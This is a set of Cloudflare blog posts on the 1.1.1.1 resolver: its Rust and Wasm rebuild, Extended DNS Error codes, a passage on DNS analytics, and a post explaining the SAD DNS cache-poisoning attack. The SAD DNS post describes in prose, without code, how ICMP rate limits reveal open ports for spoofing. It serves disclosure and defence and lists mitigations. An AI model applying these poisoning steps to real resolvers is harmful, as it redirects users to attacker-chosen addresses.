Marek Vavruša - The Cloudflare Blog

How Rust and Wasm power Cloudflare's 1.1.1.1

Anbang Wen — Tue, 28 Feb 2023 14:00:00 GMT

On April 1, 2018, Cloudflare announced the 1.1.1.1 public DNS resolver. Over the years, we added the debug page for troubleshooting, global cache purge, 0 TTL for zones on Cloudflare, Upstream TLS, and 1.1.1.1 for families to the platform. In this post, we would like to share some behind the scenes details and changes.

When the project started, Knot Resolver was chosen as the DNS resolver. We started building a whole system on top of it, so that it could fit Cloudflare's use case. Having a battle tested DNS recursive resolver, as well as a DNSSEC validator, was fantastic because we could spend our energy elsewhere, instead of worrying about the DNS protocol implementation.

Knot Resolver is quite flexible in terms of its Lua-based plugin system. It allowed us to quickly extend the core functionality to support various product features, like DoH/DoT, logging, BPF-based attack mitigation, cache sharing, and iteration logic override. As the traffic grew, we reached certain limitations.

Lessons we learned

Before going any deeper, let’s first have a bird’s-eye view of a simplified Cloudflare data center setup, which could help us understand what we are going to talk about later. At Cloudflare, every server is identical: the software stack running on one server is exactly the same as on another server, only the configuration may be different. This setup greatly reduces the complexity of fleet maintenance.

Figure 1 Data center layout

The resolver runs as a daemon process, kresd, and it doesn’t work alone. Requests, specifically DNS requests, are load-balanced to the servers inside a data center by Unimog. DoH requests are terminated at our TLS terminator. Configs and other small pieces of data can be delivered worldwide by Quicksilver in seconds. With all the help, the resolver can concentrate on its own goal - resolving DNS queries, and not worrying about transport protocol details. Now let’s talk about 3 key areas we wanted to improve here - blocking I/O in plugins, a more efficient use of cache space, and plugin isolation.

Callbacks blocking the event loop

Knot Resolver has a very flexible plugin system for extending its core functionality. The plugins are called modules, and they are based on callbacks. At certain points during request processing, these callbacks will be invoked with current query context. This gives a module the ability to inspect, modify, and even produce requests / responses. By design, these callbacks are supposed to be simple, in order to avoid blocking the underlying event loop. This matters because the service is single threaded, and the event loop is in charge of serving many requests at the same time. So even just one request being held up in a callback means that no other concurrent requests can be progressed until the callback finishes.

The setup worked well enough for us until we needed to do blocking operations, for example, to pull data from Quicksilver before responding to the client.

Cache efficiency

As requests for a domain could land on any node inside a data center, it would be wasteful to repetitively resolve a query when another node already has the answer. By intuition, the latency could be improved if the cache could be shared among the servers, and so we created a cache module which multicasted the newly added cache entries. Nodes inside the same data center could then subscribe to the events and update their local cache.

The default cache implementation in Knot Resolver is LMDB. It is fast and reliable for small to medium deployments. But in our case, cache eviction shortly became a problem. The cache itself doesn’t track for any TTL, popularity, etc. When it’s full, it just clears all the entries and starts over. Scenarios like zone enumeration could fill the cache with data that is unlikely to be retrieved later.

Furthermore, our multicast cache module made it worse by amplifying the less useful data to all the nodes, and led them to the cache high watermark at the same time. Then we saw a latency spike because all the nodes dropped the cache and started over around the same time.

Module isolation

With the list of Lua modules increasing, debugging issues became increasingly difficult. This is because a single Lua state is shared among all the modules, so one misbehaving module could affect another. For example, when something went wrong inside the Lua state, like having too many coroutines, or being out of memory, we got lucky if the program just crashed, but the resulting stack traces were hard to read. It is also difficult to forcibly tear down, or upgrade, a running module as it not only has state in the Lua runtime, but also FFI, so memory safety is not guaranteed.

Hello BigPineapple

We didn’t find any existing software that would meet our somewhat niche requirements, so eventually we started building something ourselves. The first attempt was to wrap Knot Resolver's core with a thin service written in Rust (modified edgedns).

This proved to be difficult due to having to constantly convert between the storage, and C/FFI types, and some other quirks (for example, the ABI for looking up records from cache expects the returned records to be immutable until the next call, or the end of the read transaction). But we learned a lot from trying to implement this sort of split functionality where the host (the service) provides some resources to the guest (resolver core library), and how we would make that interface better.

In the later iterations, we replaced the entire recursive library with a new one based around an async runtime; and a redesigned module system was added to it, sneakily rewriting the service into Rust over time as we swapped out more and more components. That async runtime was tokio, which offered a neat thread pool interface for running both non-blocking and blocking tasks, as well as a good ecosystem for working with other crates (Rust libraries).

After that, as the futures combinators became tedious, we started converting everything to async/await. This was before the async/await feature that landed in Rust 1.39, which led us to use nightly (Rust beta) for a while and had some hiccups. When the async/await stabilized, it enabled us to write our request processing routine ergonomically, similar to Go.

All the tasks can be run concurrently, and certain I/O heavy ones can be broken down into smaller pieces, to benefit from a more granular scheduling. As the runtime executes tasks on a threadpool, instead of a single thread, it also benefits from work stealing. This avoids a problem we previously had, where a single request taking a lot of time to process, that blocks all the other requests on the event loop.

Figure 2 Components overview

Finally, we forged a platform that we are happy with, and we call it BigPineapple. The figure above shows an overview of its main components and the data flow between them. Inside BigPineapple, the server module gets inbound requests from the client, validates and transforms them into unified frame streams, which can then be processed by the worker module. The worker module has a set of workers, whose task is to figure out the answer to the question in the request. Each worker interacts with the cache module to check if the answer is there and still valid, otherwise it drives the recursor module to recursively iterate the query. The recursor doesn’t do any I/O, when it needs anything, it delegates the sub-task to the conductor module. The conductor then uses outbound queries to get the information from upstream nameservers. Through the whole process, some modules can interact with the Sandbox module, to extend its functionality by running the plugins inside.

Let’s look at some of them in more detail, and see how they helped us overcome the problems we had before.

Updated I/O architecture

A DNS resolver can be seen as an agent between a client and several authoritative nameservers: it receives requests from the client, recursively fetches data from the upstream nameservers, then composes the responses and sends them back to the client. So it has both inbound and outbound traffic, which are handled by the server and the conductor component respectively.

The server listens on a list of interfaces using different transport protocols. These are later abstracted into streams of “frames”. Each frame is a high level representation of a DNS message, with some extra metadata. Underneath, it can be a UDP packet, a segment of TCP stream, or the payload of a HTTP request, but they are all processed the same way. The frame is then converted into an asynchronous task, which in turn is picked up by a set of workers in charge of resolving these tasks. The finished tasks are converted back into responses, and sent back to the client.

This “frame” abstraction over the protocols and their encodings simplified the logic used to regulate the frame sources, such as enforcing fairness to prevent starving and controlling pacing to protect the server from being overwhelmed. One of the things we’ve learned with the previous implementations is that, for a service open to the public, a peak performance of the I/O matters less than the ability to pace clients fairly. This is mainly because the time and computational cost of each recursive request is vastly different (for example a cache hit from a cache miss), and it’s difficult to guess it beforehand. The cache misses in recursive service not only consume Cloudflare’s resources, but also the resources of the authoritative nameservers being queried, so we need to be mindful of that.

On the other side of the server is the conductor, which manages all the outbound connections. It helps to answer some questions before reaching out to the upstream: Which is the fastest nameserver to connect to in terms of latency? What to do if all the nameservers are not reachable? What protocol to use for the connection, and are there any better options? The conductor is able to make these decisions by tracking the upstream server’s metrics, such as RTT, QoS, etc. With that knowledge, it can also guess for things like upstream capacity, UDP packet loss, and take necessary actions, e.g. retry when it thinks the previous UDP packet didn’t reach the upstream.

Figure 3 I/O conductor

Figure 3 shows a simplified data flow about the conductor. It is called by the exchanger mentioned above, with upstream requests as input. The requests will be deduplicated first: meaning in a small window, if a lot of requests come to the conductor and ask for the same question, only one of them will pass, the others are put into a waiting queue. This is common when a cache entry expires, and can reduce unnecessary network traffic. Then based on the request and upstream metrics, the connection instructor either picks an open connection if available, or generates a set of parameters. With these parameters, the I/O executor is able to connect to the upstream directly, or even take a route via another Cloudflare data center using our Argo Smart Routing technology!

The cache

Caching in a recursive service is critical as a server can return a cached response in under one millisecond, while it will be hundreds of milliseconds to respond on a cache miss. As the memory is a finite resource (and also a shared resource in Cloudflare’s architecture), more efficient use of space for cache was one of the key areas we wanted to improve. The new cache is implemented with a cache replacement data structure (ARC), instead of a KV store. This makes good use of the space on a single node, as less popular entries are progressively evicted, and the data structure is resistant to scans.

Moreover, instead of duplicating the cache across the whole data center with multicast, as we did before, BigPineapple is aware of its peer nodes in the same data center, and relays queries from one node to another if it cannot find an entry in its own cache. This is done by consistent hashing the queries onto the healthy nodes in each data center. So, for example, queries for the same registered domain go through the same subset of nodes, which not only increases the cache hit ratio, but also helps the infrastructure cache, which stores information about performance and features of nameservers.

Figure 4 Updated data center layout

Async recursive library

The recursive library is the DNS brain of BigPineapple, as it knows how to find the answer to the question in the query. Starting from the root, it breaks down the client query into subqueries, and uses them to collect knowledge recursively from various authoritative nameservers on the internet. The product of this process is the answer. Thanks to the async/await it can be abstracted as a function like such:

The function contains all the logic necessary to generate a response to a given request, but it doesn’t do any I/O on its own. Instead, we pass an Exchanger trait (Rust interface) that knows how to exchange DNS messages with upstream authoritative nameservers asynchronously. The exchanger is usually called at various await points - for example, when a recursion starts, one of the first things it does is that it looks up the closest cached delegation for the domain. If it doesn’t have the final delegation in cache, it needs to ask what nameservers are responsible for this domain and wait for the response, before it can proceed any further.

Thanks to this design, which decouples the “waiting for some responses” part from the recursive DNS logic, it is much easier to test by providing a mock implementation of the exchanger. In addition, it makes the recursive iteration code (and DNSSEC validation logic in particular) much more readable, as it’s written sequentially instead of being scattered across many callbacks.

Fun fact: writing a DNS recursive resolver from scratch is not fun at all!

Not only because of the complexity of DNSSEC validation, but also because of the necessary “workarounds” needed for various RFC incompatible servers, forwarders, firewalls, etc. So we ported deckard into Rust to help test it. Additionally, when we started migrating over to this new async recursive library, we first ran it in “shadow” mode: processing real world query samples from the production service, and comparing differences. We’ve done this in the past on Cloudflare’s authoritative DNS service as well. It is slightly more difficult for a recursive service due to the fact that a recursive service has to look up all the data over the Internet, and authoritative nameservers often give different answers for the same query due to localization, load balancing and such, leading to many false positives.

In December 2019, we finally enabled the new service on a public test endpoint (see the announcement) to iron out remaining issues before slowly migrating the production endpoints to the new service. Even after all that, we continued to find edge cases with the DNS recursion (and DNSSEC validation in particular), but fixing and reproducing these issues has become much easier due to the new architecture of the library.

Sandboxed plugins

Having the ability to extend the core DNS functionality on the fly is important for us, thus BigPineapple has its redesigned plugin system. Before, the Lua plugins run in the same memory space as the service itself, and are generally free to do what they want. This is convenient, as we can freely pass memory references between the service and modules using C/FFI. For example, to read a response directly from cache without having to copy to a buffer first. But it is also dangerous, as the module can read uninitialized memory, call a host ABI using a wrong function signature, block on a local socket, or do other undesirable things, in addition the service doesn’t have a way to restrict these behaviors.

So we looked at replacing the embedded Lua runtime with JavaScript, or native modules, but around the same time, embedded runtimes for WebAssembly (Wasm for short) started to appear. Two nice properties of WebAssembly programs are that it allows us to write them in the same language as the rest of the service, and that they run in an isolated memory space. So we started modeling the guest/host interface around the limitations of WebAssembly modules, to see how that would work.

BigPineapple’s Wasm runtime is currently powered by Wasmer. We tried several runtimes over time like Wasmtime, WAVM in the beginning, and found Wasmer was simpler to use in our case. The runtime allows each module to run in its own instance, with an isolated memory and a signal trap, which naturally solved the module isolation problem we described before. In addition to this, we can have multiple instances of the same module running at the same time. Being controlled carefully, the apps can be hot swapped from one instance to another without missing a single request! This is great because the apps can be upgraded on the fly without a server restart. Given that the Wasm programs are distributed via Quicksilver, BigPineapple’s functionality can be safely changed worldwide within a few seconds!

To better understand the WebAssembly sandbox, several terms need to be introduced first:

Host: the program which runs the Wasm runtime. Similar to a kernel, it has full control through the runtime over the guest applications.
Guest application: the Wasm program inside the sandbox. Within a restricted environment, it can only access its own memory space, which is provided by the runtime, and call the imported Host calls. We call it an app for short.
Host call: the functions defined in the host that can be imported by the guest. Comparable to syscall, it’s the only way guest apps can access the resources outside the sandbox.
Guest runtime: a library for guest applications to easily interact with the host. It implements some common interfaces, so an app can just use async, socket, log and tracing without knowing the underlying details.

Now it’s time to dive into the sandbox, so stay awhile and listen. First let’s start from the guest side, and see what a common app lifespan looks like. With the help of the guest runtime, guest apps can be written similar to regular programs. So like other executables, an app begins with a start function as an entrypoint, which is called by the host upon loading. It is also provided with arguments as from the command line. At this point, the instance normally does some initialization, and more importantly, registers callback functions for different query phases. This is because in a recursive resolver, a query has to go through several phases before it gathers enough information to produce a response, for example a cache lookup, or making subrequests to resolve a delegation chain for the domain, so being able to tie into these phases is necessary for the apps to be useful for different use cases. The start function can also run some background tasks to supplement the phase callbacks, and store global state. For example - report metrics, or pre-fetch shared data from external sources, etc. Again, just like how we write a normal program.

But where do the program arguments come from? How could a guest app send log and metrics? The answer is, external functions.

Figure 5 Wasm based Sandbox

In figure 5, we can see a barrier in the middle, which is the sandbox boundary, that separates the guest from the host. The only way one side can reach out to the other, is via a set of functions exported by the peer beforehand. As in the picture, the “hostcalls” are exported by the host, imported and called by the guest; while the “trampoline” are guest functions that the host has knowledge of.

It is called trampoline because it is used to invoke a function or a closure inside a guest instance that’s not exported. The phase callbacks are one example of why we need a trampoline function: each callback returns a closure, and therefore can’t be exported on instantiation. So a guest app wants to register a callback, it calls a host call with the callback address “hostcall_register_callback(pre_cache, #30987)”, when the callback needs to be invoked, the host cannot just call that pointer as it’s pointing to the guest’s memory space. What it can do instead is, to leverage one of the aforementioned trampolines, and give it the address of the callback closure: “trampoline_call(#30987)”.

Isolation overhead

Like a coin that has two sides, the new sandbox does come with some additional overhead. The portability and isolation that WebAssembly offers bring extra cost. Here, we'll list two examples.

Firstly, guest apps are not allowed to read host memory. The way it works is the guest provides a memory region via a host call, then the host writes the data into the guest memory space. This introduces a memory copy that would not be needed if we were outside the sandbox. The bad news is, in our use case, the guest apps are supposed to do something on the query and/or the response, so they almost always need to read data from the host on every single request. The good news, on the other hand, is that during a request life cycle, the data won’t change. So we pre-allocate a bulk of memory in the guest memory space right after the guest app instantiates. The allocated memory is not going to be used, but instead serves to occupy a hole in the address space. Once the host gets the address details, it maps a shared memory region with the common data needed by the guest into the guest’s space. When the guest code starts to execute, it can just access the data in the shared memory overlay, and no copy is needed.

Another issue we ran into was when we wanted to add support for a modern protocol, oDoH, into BigPineapple. The main job of it is to decrypt the client query, resolve it, then encrypt the answers before sending it back. By design, this doesn’t belong to core DNS, and should instead be extended with a Wasm app. However, the WebAssembly instruction set doesn’t provide some crypto primitives, such as AES and SHA-2, which prevents it from getting the benefit of host hardware. There is ongoing work to bring this functionality to Wasm with WASI-crypto. Until then, our solution for this is to simply delegate the HPKE to the host via host calls, and we already saw 4x performance improvements, compared to doing it inside Wasm.

Async in Wasm

Remember the problem we talked about before that the callbacks could block the event loop? Essentially, the problem is how to run the sandboxed code asynchronously. Because no matter how complex the request processing callback is, if it can yield, we can put an upper bound on how long it is allowed to block. Luckily, Rust’s async framework is both elegant and lightweight. It gives us the opportunity to use a set of guest calls to implement the “Future”s.

In Rust, a Future is a building block for asynchronous computations. From the user’s perspective, in order to make an asynchronous program, one has to take care of two things: implement a pollable function that drives the state transition, and place a waker as a callback to wake itself up, when the pollable function should be called again due to some external event (e.g. time passes, socket becomes readable, and so on). The former is to be able to progress the program gradually, e.g. read buffered data from I/O and return a new state indicating the status of the task: either finished, or yielded. The latter is useful in case of task yielding, as it will trigger the Future to be polled when the conditions that the task was waiting for are fulfilled, instead of busy looping until it’s complete.

Let’s see how this is implemented in our sandbox. For a scenario when the guest needs to do some I/O, it has to do so via the host calls, as it is inside a restricted environment. Assuming the host provides a set of simplified host calls which mirror the basic socket operations: open, read, write, and close, the guest can have its pseudo poller defined as below:

Here the host call reads data from a socket into a buffer, depending on its return value, the function can move itself to one of the states we mentioned above: finished(Ready), or yielded(Pending). The magic happens inside the host call. Remember in figure 5, that it is the only way to access resources? The guest app doesn’t own the socket, but it can acquire a “handle” via “hostcall_socket_open”, which will in turn create a socket on the host side, and return a handle. The handle can be anything in theory, but in practice using integer socket handles map well to file descriptors on the host side, or indices in a vector or slab. By referencing the returned handle, the guest app is able to remotely control the real socket. As the host side is fully asynchronous, it can simply relay the socket state to the guest. If you noticed that the waker function isn’t used above, well done! That’s because when the host call is called, it not only starts opening a socket, but also registers the current waker to be called then the socket is opened (or fails to do so). So when the socket becomes ready, the host task will be woken up, it will find the corresponding guest task from its context, and wakes it up using the trampoline function as shown in figure 5. There are other cases where a guest task needs to wait for another guest task, an async mutex for example. The mechanism here is similar: using host calls to register wakers.

All of these complicated things are encapsulated in our guest async runtime, with easy to use API, so the guest apps get access to regular async functions without having to worry about the underlying details.

(Not) The End

Hopefully, this blog post gave you a general idea of the innovative platform that powers 1.1.1.1. It is still evolving. As of today, several of our products, such as 1.1.1.1 for Families, AS112, and Gateway DNS, are supported by guest apps running on BigPineapple. We are looking forward to bringing new technologies into it. If you have any ideas, please let us know in the community or via email.

Dig through SERVFAILs with EDE

Stanley Chiang — Wed, 25 May 2022 12:59:18 GMT

It can be frustrating to get errors (SERVFAIL response codes) returned from your DNS queries. It can be even more frustrating if you don’t get enough information to understand why the error is occurring or what to do next. That’s why back in 2020, we launched support for Extended DNS Error (EDE) Codes to 1.1.1.1.

As a quick refresher, EDE codes are a proposed IETF standard enabled by the Extension Mechanisms for DNS (EDNS) spec. The codes return extra information about DNS or DNSSEC issues without touching the RCODE so that debugging is easier.

Now we’re happy to announce we will return more error code types and include additional helpful information to further improve your debugging experience. Let’s run through some examples of how these error codes can help you better understand the issues you may face.

To try for yourself, you’ll need to run the dig or kdig command in the terminal. For dig, please ensure you have v9.11.20 or above. If you are on macOS 12.1, by default you only have dig 9.10.6. Install an updated version of BIND to fix that.

Let’s start with the output of an example dig command without EDE support.

In the output above, we tried to do DNSSEC validation on dnssec-failed.org. It returns a SERVFAIL, but we don’t have context as to why.

Now let’s try that again with 1.1.1.1’s EDE support.

We can see there is still a SERVFAIL. However, this time there is also an EDE Code 9 which stands for “DNSKey Missing”. Accompanying that, we also have additional information saying “no SEP matching the DS found” for dnssec-failed.org. That’s better!

Another nifty feature is that we will return multiple errors when appropriate, so you can debug each one separately. In the example below, we returned a SERVFAIL with three different error codes: “Unsupported DNSKEY Algorithm”, “No Reachable Authority”, and “Network Error”.

Here’s a list of the additional codes we now support:

We have documented all the error codes we currently support with additional information you may find helpful. Refer to our dev docs for more information.

SAD DNS Explained

Marek Vavruša — Fri, 13 Nov 2020 19:06:13 GMT

This week, at the ACM CCS 2020 conference, researchers from UC Riverside and Tsinghua University announced a new attack against the Domain Name System (DNS) called SAD DNS (Side channel AttackeD DNS). This attack leverages recent features of the networking stack in modern operating systems (like Linux) to allow attackers to revive a classic attack category: DNS cache poisoning. As part of a coordinated disclosure effort earlier this year, the researchers contacted Cloudflare and other major DNS providers and we are happy to announce that 1.1.1.1 Public Resolver is no longer vulnerable to this attack.

In this post, we’ll explain what the vulnerability was, how it relates to previous attacks of this sort, what mitigation measures we have taken to protect our users, and future directions the industry should consider to prevent this class of attacks from being a problem in the future.

DNS Basics

The Domain Name System (DNS) is what allows users of the Internet to get around without memorizing long sequences of numbers. What’s often called the “phonebook of the Internet” is more like a helpful system of translators that take natural language domain names (like blog.cloudflare.com or gov.uk) and translate them into the native language of the Internet: IP addresses (like 192.0.2.254 or [2001:db8::cf]). This translation happens behind the scenes so that users only need to remember hostnames and don’t have to get bogged down with remembering IP addresses.

DNS is both a system and a protocol. It refers to the hierarchical system of computers that manage the data related to naming on a network and it refers to the language these computers use to speak to each other to communicate answers about naming. The DNS protocol consists of pairs of messages that correspond to questions and responses. Each DNS question (query) and answer (reply) follows a standard format and contains a set of parameters that contain relevant information such as the name of interest (such as blog.cloudflare.com) and the type of response record desired (such as A for IPv4 or AAAA for IPv6).

The DNS Protocol and Spoofing

These DNS messages are exchanged over a network between machines using a transport protocol. Originally, DNS used UDP, a simple stateless protocol in which messages are endowed with a set of metadata indicating a source port and a destination port. More recently, DNS has adapted to use more complex transport protocols such as TCP and even advanced protocols like TLS or HTTPS, which incorporate encryption and strong authentication into the mix (see Peter Wu’s blog post about DNS protocol encryption).

Still, the most common transport protocol for message exchange is UDP, which has the advantages of being fast, ubiquitous and requiring no setup. Because UDP is stateless, the pairing of a response to an outstanding query is based on two main factors: the source address and port pair, and information in the DNS message. Given that UDP is both stateless and unauthenticated, anyone, and not just the recipient, can send a response with a forged source address and port, which opens up a range of potential problems.

The blue portions contribute randomness

Since the transport layer is inherently unreliable and untrusted, the DNS protocol was designed with additional mechanisms to protect against forged responses. The first two bytes in the message form a message or transaction ID that must be the same in the query and response. When a DNS client sends a query, it will set the ID to a random value and expect the value in the response to match. This unpredictability introduces entropy into the protocol, which makes it less likely that a malicious party will be able to construct a valid DNS reply without first seeing the query. There are other potential variables to account for, like the DNS query name and query type are also used to pair query and response, but these are trivial to guess and don’t introduce an additional entropy.

Those paying close attention to the diagram may notice that the amount of entropy introduced by this measure is only around 16 bits, which means that there are fewer than a hundred thousand possibilities to go through to find the matching reply to a given query. More on this later.

The DNS Ecosystem

DNS servers fall into one of a few main categories: recursive resolvers (like 1.1.1.1 or 8.8.8.8), nameservers (like the DNS root servers or Cloudflare Authoritative DNS). There are also elements of the ecosystem that act as “forwarders” such as dnsmasq. In a typical DNS lookup, these DNS servers work together to complete the task of delivering the IP address for a specified domain to the client (the client is usually a stub resolver - a simple resolver built into an operating system). For more detailed information about the DNS ecosystem, take a look at our learning site. The SAD DNS attack targets the communication between recursive resolvers and nameservers.

Each of the participants in DNS (client, resolver, nameserver) uses the DNS protocol to communicate with each other. Most of the latest innovations in DNS revolve around upgrading the transport between users and recursive resolvers to use encryption. Upgrading the transport protocol between resolvers and authoritative servers is a bit more complicated as it requires a new discovery mechanism to instruct the resolver when to (and when not to use) a more secure channel. Aside from a few examples like our work with Facebook to encrypt recursive-to-authoritative traffic with DNS-over-TLS, most of these exchanges still happen over UDP. This is the core issue that enables this new attack on DNS, and one that we’ve seen before.

Kaminsky’s Attack

Prior to 2008, recursive resolvers typically used a single open port (usually port 53) to send and receive messages to authoritative nameservers. This made guessing the source port trivial, so the only variable an attacker needed to guess to forge a response to a query was the 16-bit message ID. The attack Kaminsky described was relatively simple: whenever a recursive resolver queried the authoritative name server for a given domain, an attacker would flood the resolver with DNS responses for some or all of the 65 thousand or so possible message IDs. If the malicious answer with the right message ID arrived before the response from the authoritative server, then the DNS cache would be effectively poisoned, returning the attacker’s chosen answer instead of the real one for as long as the DNS response was valid (called the TTL, or time-to-live).

For popular domains, resolvers contact authoritative servers once per TTL (which can be as short as 5 minutes), so there are plenty of opportunities to mount this attack. Forwarders that cache DNS responses are also vulnerable to this type of attack.

In response to this attack, DNS resolvers started doing source port randomization and careful checking of the security ranking of cached data. To poison these updated resolvers, forged responses would not only need to guess the message ID, but they would also have to guess the source port, bringing the number of guesses from the tens of thousands to over a billion. This made the attack effectively infeasible. Furthermore, the IETF published RFC 5452 on how to harden DNS from guessing attacks.

It should be noted that this attack did not work for DNSSEC-signed domains since their answers are digitally signed. However, even now in 2020, DNSSEC is far from universal.

Defeating Source Port Randomization with Fragmentation

Another way to avoid having to guess the source port number and message ID is to split the DNS response in two. As is often the case in computer security, old attacks become new again when attackers discover new capabilities. In 2012, researchers Amir Herzberg and Haya Schulman from Bar Ilan University discovered that it was possible for a remote attacker to defeat the protections provided by source port randomization. This new attack leveraged another feature of UDP: fragmentation. For a primer on the topic of UDP fragmentation, check out our previous blog post on the subject by Marek Majkowski.

The key to this attack is the fact that all the randomness that needs to be guessed in a DNS poisoning attack is concentrated at the beginning of the DNS message (UDP header and DNS header).If the UDP response packet (sometimes called a datagram) is split into two fragments, the first half containing the message ID and source port and the second containing part of the DNS response, then all an attacker needs to do is forge the second fragment and make sure that the fake second fragment arrives at the resolver before the true second fragment does. When a datagram is fragmented, each fragment is assigned a 16-bit IDs (called IP-ID), which is used to reassemble it at the other end of the connection. Since the second fragment only has the IP-ID as entropy (again, this is a familiar refrain in this area), this attack is feasible with a relatively small number of forged packets. The downside of this attack is the precondition that the response must be fragmented in the first place, and the fragment must be carefully altered to pass the original section counts and UDP checksum.

Also discussed in the original and follow-up papers is a method of forcing two remote servers to send packets between each other which are fragmented at an attacker-controlled point, making this attack much more feasible. The details are in the paper, but it boils down to the fact that the control mechanism for describing the maximum transmissible unit (MTU) between two servers -- which determines at which point packets are fragmented -- can be set via a forged UDP packet.

We explored this risk in a previous blog post in the context of certificate issuance last year when we introduced our multi-path DCV service, which mitigates this risk in the context of certificate issuance by making DNS queries from multiple vantage points. Nevertheless, fragmentation-based attacks are proving less and less effective as DNS providers move to eliminate support for fragmented DNS packets (one of the major goals of DNS Flag Day 2020).

Defeating Source Port Randomization via ICMP error messages

Another way to defeat the source port randomization is to use some measurable property of the server that makes the source port easier to guess. If the attacker could ask the server which port number is being used for a pending query, that would make the construction of a spoofed packet much easier. No such thing exists, but it turns out there is something close enough - the attacker can discover which ports are surely closed (and thus avoid having to send traffic). One such mechanism is the ICMP “port unreachable” message.

Let’s say the target receives a UDP datagram destined for its IP and some port, the datagram either ends up either being accepted and silently discarded by the application, or rejected because the port is closed. If the port is closed, or more importantly, closed to the IP address that the UDP datagram was sent from, the target will send back an ICMP message notifying the attacker that the port is closed. This is handy to know since the attacker now doesn’t have to bother trying to guess the pending message ID on this port and move to other ports. A single scan of the server effectively reduces the search space of valid UDP responses from 2³² (over a billion) to 2¹⁷ (around a hundred thousand), at least in theory.

This trick doesn’t always work. Many resolvers use “connected” UDP sockets instead of “open” UDP sockets to exchange messages between the resolver and nameserver. Connected sockets are tied to the peer address and port on the OS layer, which makes it impossible for an attacker to guess which “connected” UDP sockets are established between the target and the victim, and since the attacker isn’t the victim, it can’t directly observe the outcome of the probe.

To overcome this, the researchers found a very clever trick: they leverage ICMP rate limits as a side channel to reveal whether a given port is open or not. ICMP rate limiting was introduced (somewhat ironically, given this attack) as a security feature to prevent a server from being used as an unwitting participant in a reflection attack. In broad terms, it is used to limit how many ICMP responses a server will send out in a given time period. Say an attacker wanted to scan 10,000 ports and sent a burst of 10,000 UDP packets to a server configured with an ICMP rate limit of 50 per second, then only the first 50 would get an ICMP “port unreachable” message in reply.

Rate limiting seems innocuous until you remember one of the core rules of data security: don’t let private information influence publicly measurable metrics. ICMP rate limiting violates this rule because the rate limiter’s behavior can be influenced by an attacker making guesses as to whether a “secret” port number is open or not.

don’t let private information influence publicly measurable metrics

An attacker wants to know whether the target has an open port, so it sends a spoofed UDP message from the authoritative server to that port. If the port is open, no ICMP reply is sent and the rate counter remains unchanged. If the port is inaccessible, then an ICMP reply is sent (back to the authoritative server, not to the attacker) and the rate is increased by one. Although the attacker doesn’t see the ICMP response, it has influenced the counter. The counter itself isn’t known outside the server, but whether it has hit the rate limit or not can be measured by any outside observer by sending a UDP packet and waiting for a reply. If an ICMP “port unreachable” reply comes back, the rate limit hasn’t been reached. No reply means the rate limit has been met. This leaks one bit of information about the counter to the outside observer, which in the end is enough to reveal the supposedly secret information (whether the spoofed request got through or not).

Diagram inspired by original paper‌‌

Concretely, the attack works as follows: the attacker sends a bunch (large enough to trigger the rate limiting) of probe messages to the target, but with a forged source address of the victim. In the case where there are no open ports in the probed set, the target will send out the same amount of ICMP “port unreachable” responses back to the victim and trigger the rate limit on outgoing ICMP messages. The attacker can now send an additional verification message from its own address and observe whether an ICMP response comes back or not. If it does then there was at least one port open in the set and the attacker can divide the set and try again, or do a linear scan by inserting the suspected port number into a set of known closed ports. Using this approach, the attacker can narrow down to the open ports and try to guess the message ID until it is successful or gives up, similarly to the original Kaminsky attack.

In practice there are some hurdles to successfully mounting this attack.

First, the target IP, or a set of target IPs must be discovered. This might be trivial in some cases - a single forwarder, or a fixed set of IPs that can be discovered by probing and observing attacker controlled zones, but more difficult if the target IPs are partitioned across zones as the attacker can’t see the resolver egress IP unless she can monitor the traffic for the victim domain.
The attack also requires a large enough ICMP outgoing rate limit in order to be able to scan with a reasonable speed. The scan speed is critical, as it must be completed while the query to the victim nameserver is still pending. As the scan speed is effectively fixed, the paper instead describes a method to potentially extend the window of opportunity by triggering the victim's response rate limiting (RRL), a technique to protect against floods of forged DNS queries. This may work if the victim implements RRL and the target resolver doesn’t implement a retry over TCP (A Quantitative Study of the Deployment of DNS Rate Limiting shows about 16% of nameservers implement some sort of RRL).
Generally, busy resolvers will have ephemeral ports opening and closing, which introduces false positive open ports for the attacker, and ports open for different pending queries than the one being attacked.

We’ve implemented an additional mitigation to 1.1.1.1 to prevent message ID guessing - if the resolver detects an ID enumeration attempt, it will stop accepting any more guesses and switches over to TCP. This reduces the number of attempts for the attacker even if it guesses the IP address and port correctly, similarly to how the number of password login attempts is limited.

Outlook

Ultimately these are just mitigations, and the attacker might be willing to play the long game. As long as the transport layer is insecure and DNSSEC is not widely deployed, there will be different methods of chipping away at these mitigations.

It should be noted that trying to hide source IPs or open port numbers is a form of security through obscurity. Without strong cryptographic authentication, it will always be possible to use spoofing to poison DNS resolvers. The silver lining here is that DNSSEC exists, and is designed to protect against this type of attack, and DNS servers are moving to explore cryptographically strong transports such as TLS for communicating between resolvers and authoritative servers.

At Cloudflare, we’ve been helping to reduce the friction of DNSSEC deployment, while also helping to improve transport security in the long run. There is also an effort to increase entropy in DNS messages with RFC 7873 - Domain Name System (DNS) Cookies, and make DNS over TCP support mandatory RFC 7766 - DNS Transport over TCP - Implementation Requirements, with even more documentation around ways to mitigate this type of issue available in different places. All of these efforts are complementary, which is a good thing. The DNS ecosystem consists of many different parties and software with different requirements and opinions, as long as the operators support at least one of the preventive measures, these types of attacks will become more and more difficult.

If you are an operator of an DNS forwarder or recursive DNS resolver, you should consider taking the following steps to protect yourself from this attack:

Upgrade your Linux Kernel with https://git.kernel.org/linus/b38e7819cae946e2edf869e604af1e65a5d241c5 (included with v5.10), which uses unpredictable rate limits
Block the outgoing ICMP “port unreachable” messages with iptables or lower the ICMP rate limit on Linux
Keep your DNS software up to date

We’d like to thank the researchers for responsibly disclosing this attack and look forward to working with them in the future on efforts to strengthen the DNS.

How Cloudflare analyzes 1M DNS queries per second

Marek Vavruša — Wed, 10 May 2017 21:50:20 GMT

On Friday, we announced DNS analytics for all Cloudflare customers. Because of our scale –– by the time you’ve finished reading this, Cloudflare DNS will have handled millions of DNS queries –– we had to be creative in our implementation. In this post, we’ll describe the systems that make up DNS Analytics which help us comb through trillions of these logs each month.

How logs come in from the edge

Cloudflare already has a data pipeline for HTTP logs. We wanted to utilize what we could of that system for the new DNS analytics. Every time one of our edge services gets an HTTP request, it generates a structured log message in the Cap’n Proto format and sends it to a local multiplexer service. Given the volume of the data, we chose not to record the full DNS message payload, only telemetry data we are interested in such as response code, size, or query name, which has allowed us to keep only ~150 bytes on average per message. It is then fused with processing metadata such as timing information and exceptions triggered during query processing. The benefit of fusing data and metadata at the edge is that we can spread the computational cost across our thousands of edge servers, and log only what we absolutely need.

